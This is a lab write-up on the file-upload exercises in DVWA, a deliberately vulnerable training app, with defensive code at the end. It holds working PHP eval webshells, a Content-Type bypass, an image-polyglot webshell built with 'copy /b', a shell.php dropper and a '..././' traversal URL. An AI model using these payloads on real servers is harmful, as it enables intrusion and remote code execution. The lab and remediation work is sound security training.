Arbitrary File Upload
low
Source code analysis
The low-level file upload performs no filtering at all:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
Upload a one-line webshell file:
<?php @eval($_POST['cmd']);?>
The file is accessible.
Connect with AntSword (蚁剑).
medium
Source code analysis
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
A new condition has been added:
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) )
The upload only succeeds if the uploaded file's type is "image/jpeg" or "image/png" and the file size is below 100000.
Method 1
Capture the request with Burp Suite and change the Content-Type to "image/jpeg" or "image/png".
The upload succeeds; connect with AntSword.
Method 2
Prepare a one-line webshell and add phpinfo for verification:
<?php @eval($_REQUEST['cmd']);phpinfo();?>
Use cmd to generate a one-line image webshell.
Prepare the image kun.png and the one-line webshell 2.php:
copy kun.jpg/b+2.php/a ikun.jpg
The one-line webshell is appended to the end of the image data.
Upload the one-line image webshell directly.
It can be accessed,
but because its extension is .jpg rather than .php, the PHP is not parsed and AntSword cannot connect.
This can be combined with the file inclusion vulnerability: file inclusion ignores the file extension and parses the PHP statements.
The medium-level file inclusion filters ../, which can be bypassed by double-writing it; files can be read and PHP code executed, but AntSword still cannot connect directly:
<?php file_put_contents('shell.php','<?php @eval($_REQUEST[777])?>')?>
Generate a new image webshell and upload it (avoiding a duplicate name):
copy kun.jpg/b+2.php/a kunkun.jpg
Execute it via file inclusion:
http://10.9.47.241/dvwa/vulnerabilities/fi/?page=..././..././hackable/uploads/kunkun.jpg
The generated file is in the same directory as the file inclusion page, i.e.:
http://10.9.47.241/dvwa/vulnerabilities/fi/shell.php
Connect with AntSword.
high
Source code analysis
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
getimagesize is used to check whether the uploaded file is an image, and strtolower converts the file extension to lowercase before checking whether it is jpg/jpeg or png.
Filename handling: basename gets the base name of the uploaded file, and strrpos locates the file extension.
shell
Same as medium Method 2.
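As an added example (not DVWA's code and not part of the original writeup), the handler below shows what the medium and high checks are missing: it ignores the client-supplied Content-Type and filename, re-encodes the image with GD so bytes appended with copy /b are not carried over, and stores the result under a server-generated name. It assumes DVWA_WEB_PAGE_TO_ROOT and the hackable/uploads/ directory from the page, and that the GD extension is available.

```php
<?php
// Added example, not DVWA's own code. Assumes DVWA_WEB_PAGE_TO_ROOT and
// hackable/uploads/ from the page, and the GD extension.
function save_uploaded_image(array $file, string $upload_dir): ?string {
    // Trust only what the server can verify on disk: never the client-sent
    // 'type' (medium's check) or the filename alone (high's check).
    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] >= 100000) {
        return null;
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // getimagesize() only inspects the header, so an image with PHP appended
    // after it still passes; use it as a first gate, not the final decision.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false) {
        return null;
    }
    // Re-encode with GD: the decoder yields pixel data only, so anything
    // appended after the image stream does not reach the new file.
    switch ($info[2]) {
        case IMAGETYPE_JPEG:
            $img = @imagecreatefromjpeg($file['tmp_name']);
            $ext = 'jpg';
            break;
        case IMAGETYPE_PNG:
            $img = @imagecreatefrompng($file['tmp_name']);
            $ext = 'png';
            break;
        default:
            return null;
    }
    if ($img === false) {
        return null;
    }
    // Server-chosen random name: the client's filename and extension are
    // discarded, so no attacker-controlled name is written to the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($upload_dir, '/') . '/' . $name;
    $ok = ($ext === 'jpg') ? imagejpeg($img, $dest, 90) : imagepng($img, $dest);
    imagedestroy($img);
    return $ok ? $name : null;
}

if (isset($_POST['Upload'])) {
    $saved = save_uploaded_image($_FILES['uploaded'], DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/');
    echo $saved === null
        ? '<pre>Your image was not uploaded.</pre>'
        : '<pre>' . htmlspecialchars($saved) . ' successfully uploaded!</pre>';
}
```

Even with re-encoding, the uploads directory should be configured so the web server never executes scripts from it, and the file inclusion page should resolve paths against an allowlist, since the writeup's final step only works because inclusion parses whatever file it reaches.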